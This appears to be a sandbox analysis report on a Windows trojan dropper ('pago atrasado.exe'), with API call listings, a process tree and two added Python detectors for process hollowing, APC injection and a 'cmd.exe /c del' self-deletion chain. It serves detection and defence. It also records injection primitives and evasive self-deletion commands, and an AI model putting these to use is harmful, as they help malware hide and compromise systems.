Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0457A710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579B00 NtSetValueKey
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_04579730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0457A3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_045797A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B18680 NtReadFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B187B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B18700 NtClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B185D0 NtCreateFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B186FB NtClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1867A NtReadFile
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B185CA NtCreateFile
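The "Code function" rows above are static call-site findings: they list which native API wrappers each process image contains, not a trace of what executed. What an analyst wants from such a listing is the grouping by process and a check of which injection primitive chains are complete. The script below is an added example for this report, not Joe Sandbox code; it reads the rows in the flattened form in which this page presents them (and in a separated form), and the two technique definitions (which Nt* primitives make up process hollowing and APC injection) are this example's own choice, not a vendor signature. The sample input is copied from the listing above.

```python
"""Group the Nt* call sites in a sandbox "Code function" listing by process
and check which injection primitive chains each process has available.
Added example for this report; it is not Joe Sandbox code. The technique
definitions are this example's own choice of primitives."""
import ntpath
import re
from collections import defaultdict

# Rows taken from this report's listing, in the flattened form in which the
# page presents them ("...exeCode function: ..."). The last row is a
# different row type and is skipped by the parser.
SAMPLE = r"""
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A098A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A09950 NtQueueApcThread,
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00A0A770 NtOpenThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,
Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
"""

# Accepts "Source: <image>Code function: <proc>_<stage>_<addr> <f1>,<f2>,"
# with or without a " | " separator between the two columns. <proc> is the
# sandbox's process number, not a Windows PID.
_LINE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+(?P<funcs>[\w,]+)"
)

TECHNIQUES = {
    # Carve out the target image, map/write the payload, redirect the main
    # thread to it, and let it run.
    "process hollowing": {"NtUnmapViewOfSection", "NtMapViewOfSection",
                          "NtWriteVirtualMemory", "NtSetContextThread",
                          "NtResumeThread"},
    # Write into a foreign process and queue a user-mode APC on one of its
    # threads.
    "APC injection": {"NtOpenThread", "NtWriteVirtualMemory", "NtQueueApcThread"},
}


def parse(text):
    """Return {(image basename, process number): set of Nt* names} from report rows."""
    calls = defaultdict(set)
    for line in text.splitlines():
        m = _LINE.search(line)
        if not m:
            continue  # memory-string, registry and other row types are ignored
        names = {f for f in m.group("funcs").split(",") if f.startswith("Nt")}
        calls[(ntpath.basename(m.group("src")), int(m.group("proc")))] |= names
    return calls


def assess(text):
    """Per process and technique: (primitives present, primitives missing)."""
    return {key: {name: (sorted(need & seen), sorted(need - seen))
                  for name, need in TECHNIQUES.items()}
            for key, seen in parse(text).items()}


def flagged(text):
    """Processes holding a complete primitive chain, as (image, proc, technique)."""
    return sorted((image, proc, name)
                  for (image, proc), techs in assess(text).items()
                  for name, (_, missing) in techs.items() if not missing)


if __name__ == "__main__":
    for image, proc, name in flagged(SAMPLE):
        print(f"{image} (process {proc}): complete chain for {name}")
    for (image, proc), techs in assess(SAMPLE).items():
        for name, (present, missing) in techs.items():
            if present and missing:
                print(f"{image} (process {proc}): {name} partial, missing {missing}")
```

On the rows above, process 16 (colorcpl.exe) holds complete chains for both techniques, while process 1 (the dropper) has every hollowing primitive except NtResumeThread in its rows. Treat the result as a capability inventory to corroborate with the dynamic evidence elsewhere in the report (the thread-injection and process-hollowing signatures), not as proof that a chain executed.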
Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
Source: C:\Users\user\Desktop\pago atrasado.exe | File read: C:\Users\user\Desktop\pago atrasado.exe
Source: pago atrasado.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pago atrasado.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Users\user\Desktop\pago atrasado.exe | Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
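The process tree above is the part of this report that translates most directly into endpoint detection: explorer.exe starts a SysWOW64 binary (colorcpl.exe) with no arguments, and that binary then runs cmd.exe /c del against the original dropper. Neither event is conclusive alone (installers delete their own temporary copies with the same cmd.exe idiom), so the script below scores the chain rather than the single event. It is an added example, not sandbox or vendor code; the event records are constructed to mirror this report's process tree with made-up PIDs and one benign control entry, and the Sysmon-like field names are an assumption of the example.

```python
"""Score cmd.exe "/c del" events for the self-deletion chain in this report:
explorer.exe -> argument-less SysWOW64 binary -> cmd.exe deleting the dropper.
Added example; not sandbox or vendor code. Field names are Sysmon-like by
assumption."""
import ntpath
import re

# Constructed process-creation events modelled on the report's process tree.
# PIDs are made up; the last entry is a benign control (an installer removing
# its own temporary copy, a common legitimate use of the same idiom).
EVENTS = [
    {"pid": 101, "ppid": 100, "image": r"C:\Users\user\Desktop\pago atrasado.exe",
     "parent_image": r"C:\Users\user\Desktop\pago atrasado.exe",
     "cmdline": r'"C:\Users\user\Desktop\pago atrasado.exe"'},
    {"pid": 200, "ppid": 4, "image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\colorcpl.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Windows\SysWOW64\colorcpl.exe",
     "cmdline": r'C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\pago atrasado.exe"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\conhost.exe",
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 500, "ppid": 4, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent_image": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "cmdline": r'cmd.exe /c del "C:\Users\user\AppData\Local\Temp\setup.exe"'},
]

# "/c del <path>.exe" with the path optionally wrapped in " or ' (the report
# renders it with single quotes; Windows command lines usually use double).
_DEL = re.compile(r"""/c\s+del\s+["']?(?P<target>[^"']+?\.exe)["']?""", re.IGNORECASE)

SYSWOW64 = "c:\\windows\\syswow64\\"


def del_target(cmdline):
    """Path of the .exe a cmd.exe command line deletes, or None."""
    m = _DEL.search(cmdline)
    return m.group("target") if m else None


def self_delete_findings(events):
    """One finding per cmd.exe deletion, scored by how closely the chain
    matches explorer.exe -> argument-less SysWOW64 binary -> delete another file."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "cmd.exe":
            continue
        target = del_target(e["cmdline"])
        if target is None:
            continue
        deleter = e["parent_image"]            # process that asked for the delete
        parent_ev = by_pid.get(e["ppid"])      # how the deleter itself was started
        # Deleting a file other than itself is what separates a hollowed host
        # cleaning up the dropper from an installer cleaning up its own copy.
        deletes_other = ntpath.normcase(target) != ntpath.normcase(deleter)
        from_explorer = parent_ev is not None and \
            ntpath.basename(parent_ev["parent_image"]).lower() == "explorer.exe"
        argless_syswow64 = parent_ev is not None and \
            parent_ev["image"].lower().startswith(SYSWOW64) and \
            parent_ev["cmdline"].strip().strip('"').lower() == parent_ev["image"].lower()
        severity = "high" if deletes_other and from_explorer and argless_syswow64 else "low"
        findings.append({"pid": e["pid"], "deleter": ntpath.basename(deleter),
                         "target": ntpath.basename(target), "deletes_other": deletes_other,
                         "from_explorer": from_explorer, "argless_syswow64": argless_syswow64,
                         "severity": severity})
    return findings


if __name__ == "__main__":
    for f in self_delete_findings(EVENTS):
        print(f"pid {f['pid']}: {f['deleter']} deleted {f['target']} -> {f['severity']}")
```

Run on the constructed events, the colorcpl.exe chain scores high and the installer control scores low. The argument-less check is deliberately strict (the command line must be exactly the image path); a SysWOW64 binary that explorer.exe launched with a document argument is ordinary user activity and should not raise the score.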
Source: C:\Users\user\Desktop\pago atrasado.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\pago atrasado.exe | File created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmp
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/2@12/5
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\pago atrasado.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts